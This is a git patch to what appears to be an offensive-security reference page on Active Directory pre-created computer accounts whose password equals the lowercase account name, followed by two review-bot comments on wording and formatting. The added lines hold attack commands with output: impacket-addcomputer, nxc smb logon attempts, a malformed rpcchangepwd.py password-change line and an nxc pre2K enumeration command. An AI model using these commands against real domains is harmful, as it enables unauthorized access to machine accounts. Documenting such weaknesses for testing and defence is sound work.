From c77236f6eb0f585f31d82e64d1b75ab5de3dee0c Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 20 Nov 2024 22:31:57 +0100 Subject: [PATCH] Server with password=lower(machine-account-name) --- .../pwd-precreated-computer.md | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/docs/active-directory/pwd-precreated-computer.md b/docs/active-directory/pwd-precreated-computer.md index 9ff81cf..d62a743 100644 --- a/docs/active-directory/pwd-precreated-computer.md +++ b/docs/active-directory/pwd-precreated-computer.md @@ -1,6 +1,6 @@ # Password - Pre-Created Computer Account -When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. +When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. ```ps1 # Create a machine with default password 
@@ -11,6 +11,20 @@ djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DE * When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. * Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) + ```ps1 + python3 rpcchangepwd.py '/COMPUTER>$':''@ -newpass '' + ``` + +:warning: When the machine account name and the password are the same, the machine will also act like a pre-Windows 2000 computer and the authentication will result in `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. + +```ps1 +$ impacket-addcomputer -dc-ip 10.10.10.10 EXODIA.LOCAL/Administrator:P@ssw0rd -computer-name swkserver -computer-pass swkserver +[*] Successfully added machine account swkserver$ with password swkserver. + +$ nxc smb 10.10.10.10 -u 'swkserver$' -p swkserver +SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-8OJFTLMU1IG) (domain:EXODIA.LOCAL) (signing:True) (SMBv1:False) +SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [-] EXODIA.LOCAL\swkserver$:swkserver STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT +``` ## Enumerate Pre-Created Computer Account @@ -20,7 +34,6 @@ Identify pre-created computer accounts, save the results to a file, and obtain T nxc -u username -p password -M pre2K ``` - ## References -* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) \ No newline at end of file +* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/)
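Review bot: The intro paragraph in the first hunk (`@@ -1,6 +1,6 @@`) is removed and re-added with no visible text difference, so this appears to be a whitespace-only edit unrelated to the commit subject. Either drop it or, since the line is being touched anyway, use it to tighten the wording ("checkmark is checked") and to state explicitly that the password is the lowercase account name without the trailing `$`, which the **SERVERDEMO$** / **serverdemo** example only implies.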
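Review bot: In the second hunk (`@@ -11,6 +11,20 @@`), the added `rpcchangepwd.py` line reads `'/COMPUTER>$':''@ -newpass ''`, with a stray `>`, nothing before the `/`, nothing after the `@` and empty quoted passwords, so a reader cannot tell what goes in each position. Spell out every argument with named placeholders, in a form that does not rely on bare angle brackets. Both added fences are tagged `ps1` although they contain `python3`, `impacket-addcomputer` and `nxc` sessions with `$` prompts; a shell or console tag would match the content. The warning paragraph also says the behaviour occurs when the account name and password "are the same", while the commit subject says `password=lower(machine-account-name)`; the `swkserver` example is already lowercase, so it does not show which of the two holds, and the text should say whether case matters. Since the page documents a weak-credential condition, a short sentence on how an administrator can find and reset such accounts would round out the section.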